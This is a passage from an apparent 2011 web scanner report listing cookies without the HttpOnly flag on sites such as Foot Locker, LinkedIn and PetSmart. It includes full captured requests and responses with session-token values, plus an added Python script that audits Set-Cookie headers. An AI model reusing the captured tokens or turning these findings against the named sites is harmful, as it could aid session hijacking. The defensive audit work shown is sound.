Severity:   Low
Confidence:   Firm
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/login_form.cfm HTTP/1.1
Host: www.footlocker.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:57:50 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 10:57:50 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQrJBvJgWGhaUcy748QcpFTksNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: NST=2011%2D05%2D16%2005%3A57%3A50;path=/
Set-Cookie: TID=5555%2D50161105572150050510308%2D0;expires=Sun, 14-Aug-2011 10:57:50 GMT;path=/
Set-Cookie: TRACK_USER_P=31155501611055750050572953;expires=Wed, 08-May-2041 10:57:50 GMT;path=/
Set-Cookie: DOTOMI_SESSION=1;path=/
Set-Cookie: CHOSEN_BANNER=3;expires=Wed, 08-May-2041 10:57:50 GMT;path=/
Content-Length: 3571


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

13.42. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...

13.43. https://www.footlocker.com/account/default/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...

13.44. http://www.gnc.com/community/index.jsp%20%20

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gnc.com
Path:   /community/index.jsp%20%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/index.jsp%20%20 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:16:24 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=f5hHNQ5YYHfFrLKw6fkW4j6LhJpz8ZYLdnCQyDkP3DhhtWxJ2d2l!1363466968; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81483


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...

13.45. http://www.helzberg.com/account.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.helzberg.com
Path:   /account.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account.do?method=start HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=67638cb10049a42429ba4a456b90.helzberg-b2c-i4; __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); customer=none; basket=none; s_cc=true; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511291580}; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.helzberg.com/account/login.do?method=view
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 10:45:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:04 GMT
Connection: close
Set-Cookie: JSESSIONID=868bee483f5520321a592b5e01c3.helzberg-b2c-i4; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 10:45:04 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 10:45:04 GMT; Path=/
Content-Length: 0


13.46. http://www.linkedin.com/companyInsider

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZpPi5xXPu3wAUyoFmEPiRoFWLLVIhVePrpPMOWXudLVqstNpbsiqk6:1305541361:db371bb2e2f7f4cf87c484a45d4fcbd618246dc6"; Version=1; Max-Age=1799; Expires=Mon, 16-May-2011 10:52:40 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:4068959828274013740"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:22:41 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Mon, 16-May-2011 10:53:58 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

13.47. https://www.petsmart.com/coreg/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.petsmart.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=register HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:17:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://www.petsmart.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 307

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.petsmart.com/checkout/
...[SNIP]...
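
The check the issue detail describes, as an added example that is not part of the XSS.CX report: a small Python audit that parses the Set-Cookie headers of a captured response, lists the missing HttpOnly (and, for a response served over HTTPS, Secure) attributes, ranks a session cookie above a tracking cookie the way the scanner does, and drops cookies the server is deleting (empty value, Max-Age of zero, or an Expires at or before the response's own Date), which is a pattern several of the tracker responses in this section show. The two sample responses are constructed to resemble the captures in 13.47 and 13.53; host names and cookie values are made up, and the list of session-cookie names is an assumption.

```python
"""Audit Set-Cookie headers in a captured HTTP response for missing HttpOnly/Secure.
Added example, not part of the XSS.CX report; sample responses are constructed."""
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
import re

# Assumption: a fixed list of conventional session-cookie names. A fuller audit
# would also weigh value entropy and which requests the cookie actually gates.
SESSION_NAME_RE = re.compile(
    r"^(JSESSIONID|PHPSESSID|ASP\.NET_SessionId|ASPSESSIONID\w*|CFID|CFTOKEN|"
    r"session[-_]?id|sid)$", re.IGNORECASE)

@dataclass
class CookieFinding:
    name: str
    value: str
    attrs: dict        # lower-cased attribute name -> value ('' for bare flags)
    is_session: bool
    cleared: bool      # the server is deleting the cookie, not issuing one
    missing: list      # expected attributes that are absent: 'HttpOnly', 'Secure'

def parse_set_cookie(header_value: str):
    """Split 'name=value; Attr; Attr=val' into (name, value, attrs); quotes on the value are dropped."""
    parts = [p.strip() for p in header_value.split(";")]   # ';' inside a quoted value is not handled
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip().strip('"'), attrs

def _parse_http_date(text: str):
    """Cookie dates ('Thu, 01-Jan-1970 00:00:10 GMT') and RFC 1123 dates both parse here."""
    try:
        dt = parsedate_to_datetime(text)
    except (TypeError, ValueError):       # TypeError on Python < 3.10, ValueError after
        return None
    return dt if dt is None or dt.tzinfo else dt.replace(tzinfo=timezone.utc)

def _is_cleared(value: str, attrs: dict, ref: datetime) -> bool:
    """Empty value, Max-Age <= 0, or Expires at/before the response Date: the server is
    removing the cookie, and reporting that as 'issued without HttpOnly' is noise."""
    if value == "":
        return True
    if "max-age" in attrs:                            # Max-Age wins over Expires (RFC 6265)
        age = attrs["max-age"]
        return age.lstrip("-").isdigit() and int(age) <= 0
    exp = _parse_http_date(attrs["expires"]) if "expires" in attrs else None
    return exp is not None and exp <= ref

def audit_response(raw: str, over_https: bool):
    """Return one CookieFinding per Set-Cookie header in a raw HTTP response."""
    head = raw.replace("\r\n", "\n").partition("\n\n")[0]
    hdrs = [(k.strip().lower(), v.strip()) for k, sep, v in
            (line.partition(":") for line in head.splitlines()) if sep]
    dates = [_parse_http_date(v) for k, v in hdrs if k == "date"]
    ref = (dates and dates[0]) or datetime.now(timezone.utc)   # judge Expires at capture time
    findings = []
    for key, val in hdrs:
        if key != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(val)
        missing = [a for a in ("HttpOnly", "Secure") if a.lower() not in attrs]
        if not over_https:                 # only demand Secure when the response itself came over TLS
            missing = [a for a in missing if a != "Secure"]
        findings.append(CookieFinding(name, value, attrs, bool(SESSION_NAME_RE.match(name)),
                                      _is_cleared(value, attrs, ref), missing))
    return findings

def summarize(findings):
    """Rank as the scanner does: a session cookie without HttpOnly is Low, any other
    cookie lacking an attribute is Information, and cookie deletions are dropped."""
    out = []
    for f in findings:
        if f.cleared or not f.missing:
            continue
        sev = "Low" if f.is_session and "HttpOnly" in f.missing else "Information"
        out.append((f.name, sev, f.missing))
    return out

# Constructed sample modelled on 13.47: a session cookie set over HTTPS with no attributes.
SAMPLE_HTTPS_LOGIN = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Date: Mon, 16 May 2011 10:17:46 GMT\r\n"
    "Location: https://shop.example/checkout/index.jsp?process=home\r\n"
    "Set-Cookie: JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz5!-1124203437; path=/\r\n"
    "\r\n<html><head><title>302 Moved Temporarily</title></head></html>")

# Constructed sample modelled on a tracking-pixel response (13.53): one cookie is being
# deleted (empty value, Expires in 1970) and one is a six-month tracker.
SAMPLE_HTTP_PIXEL = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 16 May 2011 01:54:16 GMT\r\n"
    'Set-Cookie: adh=""; Domain=tracker.example; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/\r\n'
    "Set-Cookie: clid=2ll77mm01171voofy6a0; Domain=tracker.example; "
    "Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/\r\n"
    "Content-Type: image/gif\r\n\r\n")
```

Calling summarize(audit_response(SAMPLE_HTTPS_LOGIN, True)) yields a single Low finding for JSESSIONID missing both HttpOnly and Secure, while the pixel sample yields one Information finding for clid and nothing for the cleared adh cookie. Remediation is server-side: the Servlet 2.5/JSP 2.1 and JBoss 4.2 (Servlet 2.4) stacks identified by the X-Powered-By headers above do not add HttpOnly to JSESSIONID here; a Servlet 3.0 container accepts <session-config><cookie-config><http-only>true</http-only><secure>true</secure></cookie-config></session-config> in web.xml, and on older containers the Set-Cookie header has to be rewritten by a filter or by the front-end proxy.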

13.48. http://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID and TS1c138a. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that this response is sent over plain HTTP (it only then redirects to the HTTPS sign-in page) and neither cookie carries the Secure attribute; the same JSESSIONID value is presented again on the HTTPS request in 13.49, so the session identifier has already crossed the network in clear text.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
